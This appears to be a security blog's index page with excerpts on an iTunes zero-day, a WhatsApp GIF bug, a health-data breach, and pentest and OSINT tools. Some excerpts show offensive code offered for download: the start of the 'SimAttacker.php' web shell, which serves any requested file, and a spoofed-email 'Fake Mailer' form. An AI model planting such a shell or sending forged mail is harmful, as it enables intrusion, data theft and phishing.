Apple iTunes and iCloud for Windows ZeroDay Exploited in Ransomware Attacks

Attackers exploit an “unquoted path” flaw in the Bonjour updater in iTunes for Windows to deliver ransomware attacks. A zero-day vulnerability found in Apple iTunes and iCloud was exploited by cybercriminals to infect Windows computers of an automotive company with the BitPaymer ransomware. The attack was reportedly not detected by antivirus solutions....

Tū Ora Fails!!! TO SECURE MEDICAL AND PERSONAL DATA OF 1 MILLION PEOPLE…

ABOUT Tū Ora ... Compass Health Wellington Trust (formerly named the Greater Wellington Health Trust) was formed in 1997 to contract with District Health Boards and other funders to provide health services, and was managed by the Wellington Independent Practitioner's Association (WIPA, formed in 1995). Compass Health in...

Watsapp had a bug that can be exploitable through a gif – CVE-2019-11932

WHAT IS A GIF?An animated GIF is an image encoded in a graphics interchange format (GIF), which contains a number of images or frames in a single file and is described by its own graphic control extension. The frames are presented in a specific order in order to convey animation. An animated...

IP Address Tracing Script- PHP Simple IP logging Script

ip logging Script- Ip Address Trackoing

<?php $user_agent = $_SERVER; // Getting OS Name function getOS() { global $user_agent; $os_platform = "Unknown OS Platform"; $os_array = array( ...

Nishang- PowerShell Penetration Testing Tool

nishang Penetration Testing Powershell

Nishang Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing Usage

Fake Mailer PHP Script – Fake Mailer Sender

<html> <head> <meta http-equiv="author" content="The Alchemist"/> <title> The Alchemist Fake Mailer </title> </head> <body background="http://fc00.deviantart.net/fs70/i/2011/324/9/2/black___purple_textures_by_paralyzinglove-d4gscvx.jpg"> <p align=center> <img src="http://i67.photobucket.com/albums/h298/bcfcrule11/theAlchemist.png" alt="The Alchemist Fake Mailer" /></p> <form name="fakemail" action="<?php $PHP_SELF; ?>" method="POST"> <p><label for="fname"><b><font size="5" color=c0c0c0>From name :</b></font></label><br> <input name="fname" id="fname" type="text" class="formbox" /><br></p> <p><label for="femail"><font size="5" color=c0c0c0>From email id :</font></label><br> <input name="femail" id="femail" type="text" class="formbox" /><br></p> <p><label for="to"><font size="5" color=c0c0c0>To :</font></label><br> <input name="to" id="to" type="text" class="formbox"/><br></p> <p><label for="subject"><font size="5" color=c0c0c0>Subject :</font></label><br> <input name="subject" id="subject" type="text" class="formbox"/><br></p> <p><label...

SimAttacker.php Shell

simattacker.php shell download

<? //download Files Code $fdownload=$_GET; if ($fdownload <> "" ){ // path & file name $path_parts = pathinfo("$fdownload"); $entrypath=$path_parts; $name = "$fdownload"; $fp = fopen($name, 'rb'); header("Content-Disposition: attachment; filename=$entrypath"); header("Content-Length: " . filesize($name)); fpassthru($fp); exit; } ?> <html> <head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title> <style> <!-- body { font-family: Tahoma; font-size: 8pt } --> </style> </head> <body> <? error_reporting(E_ERROR | E_WARNING | E_PARSE); ...

Mobile Security Framework (MobSF)

Mobile Application Security Testing Version: v2.0 beta Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF support mobile app binaries (APK, IPA & APPX) along ...

Important Resources for Ethical hackers and Penetration Tester

Learning the Skills NameDescriptionBadBinaries.coma simple opendir full of quality docs and notes on a variety of security topics; good walkthroughs on malware trafic analysis and sysadmin stuff.CS 642: Intro to Computer Securityacademic content, full semester course, includes assigned readings, homework and github refs for exploit examples. NO VIDEO LECTURES.Cybrarycoursera style website, lots...

Social Mapper Tool by Jacob Wilkin

Social Mapper Tool Tutorial How to run : git clone https://github.com/Greenwolf/social_mapper.git Social Mapper A Social Media Mapping Tool that correlates profiles via facial recognition by Jacob Wilkin (Greenwolf). Social Mapper is an Open Source Intelligence Tool that uses facial recognition...